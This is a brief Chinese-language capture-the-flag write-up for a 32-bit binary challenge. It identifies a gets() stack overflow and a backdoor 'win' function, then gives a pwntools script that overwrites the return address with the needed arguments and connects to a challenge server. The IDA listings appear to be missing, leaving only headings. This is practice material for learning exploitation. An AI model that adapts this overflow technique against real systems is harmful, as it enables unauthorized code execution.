# 1. 查看程序
32 位程序,开启了 NX
IDA32 查看
main:
vuln:
后门 win:
# 2. 漏洞分析
有 gets 函数可以导致任意字节的溢出,然后有个后门,溢出到这里传参满足条件就行
# 3.exp
from pwn import * | |
from LibcSearcher import * | |
#context.log_level = 'debug' | |
context(os='linux', arch='i386', log_level='debug') | |
p=remote('node4.buuoj.cn',26066) | |
win=0x80485CB | |
main=0x804866D | |
p.recvuntil("string: \n") | |
payload1=b"a"*(0x6c+4)+p32(win)+p32(main)+p32(0xDEADBEEF)+p32(0xDEADC0DE) | |
p.sendline(payload1) | |
p.interactive() |
